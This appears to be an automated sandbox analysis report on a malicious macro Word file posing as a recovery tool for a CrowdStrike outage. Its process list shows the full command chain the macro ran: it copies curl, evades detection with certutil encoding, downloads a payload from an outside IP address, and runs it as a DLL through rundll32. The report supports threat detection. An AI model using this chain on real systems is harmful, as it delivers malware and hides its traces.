Overview

overview

10

Static

static

8

New_Recove...s.docm

windows7-x64

10

New_Recove...s.docm

windows10-2004-x64

10

Analysis

  • max time kernel
    107s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    22-07-2024 13:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

  • Size

    302KB

  • MD5

    dd2100dfa067caae416b885637adc4ef

  • SHA1

    499f8881f4927e7b4a1a0448f62c60741ea6d44b

  • SHA256

    803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61

  • SHA512

    809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda

  • SSDEEP

    6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\Admin\AppData\Local\Temp & certutil -f -encode C:\Users\Admin\AppData\Local\Temp\curl.exe C:\Users\Admin\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\Admin\AppData\Local\Temp\curl.txt C:\Users\Admin\AppData\Local\Temp\curl.exe & C:\Users\Admin\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll & del C:\Users\Admin\AppData\Local\Temp\curl.exe & del C:\Users\Admin\AppData\Local\Temp\curl.txt & del C:\Users\Admin\AppData\Local\Temp\curl.exe & del C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\SysWOW64\xcopy.exe
        xcopy C:\Windows\System32\curl.exe C:\Users\Admin\AppData\Local\Temp
        3⤵
        • Enumerates system info in registry
        PID:2980
      • C:\Windows\SysWOW64\certutil.exe
        certutil -f -encode C:\Users\Admin\AppData\Local\Temp\curl.exe C:\Users\Admin\AppData\Local\Temp\curl.txt
        3⤵
          PID:2900
        • C:\Windows\SysWOW64\certutil.exe
          certutil -f -decode C:\Users\Admin\AppData\Local\Temp\curl.txt C:\Users\Admin\AppData\Local\Temp\curl.exe
          3⤵
            PID:2132
          • C:\Windows\SysWOW64\certutil.exe
            certutil -f -decode C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll
            3⤵
              PID:2732
            • C:\Windows\SysWOW64\rundll32.exe
              rundll32 C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll,DllMain
              3⤵
                PID:2916
            • C:\Windows\splwow64.exe
              C:\Windows\splwow64.exe 12288
              2⤵
                PID:2632

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
              Filesize

              19KB

              MD5

              51a272e2e6d2dab50c616696a9dd3dd2

              SHA1

              71f125d252626dd4386f00253ddcb45d8d6e38ff

              SHA256

              ea94f0c81eeb42e5c5239099b14d772b1753833a8e461567ebf5c8173047d0d4

              SHA512

              c99553ddd163cc42914818bc08c9bd8405b6c746f2f3bc36b67aa2f1cb499a634a060d432f45f05b1bc0937253bda74432e9978dfe050fe524fe6a8c9bf46850

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
              Filesize

              2B

              MD5

              f3b25701fe362ec84616a93a45ce9998

              SHA1

              d62636d8caec13f04e28442a0a6fa1afeb024bbb

              SHA256

              b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

              SHA512

              98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

              Download Submit

            • memory/2908-14-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2908-22-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-21-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-20-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-19-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-18-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-17-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-16-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-15-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-54-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-23-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-9-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-11-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-12-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-8-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-7-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-10-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-2-0x0000000072F4D000-0x0000000072F58000-memory.dmp

              Filesize

              44KB

              Download

            • memory/2908-31-0x0000000072F4D000-0x0000000072F58000-memory.dmp

              Filesize

              44KB

              Download

            • memory/2908-32-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-13-0x0000000000350000-0x0000000000450000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2908-53-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2908-0-0x000000002F5D1000-0x000000002F5D2000-memory.dmp

              Filesize

              4KB

              Download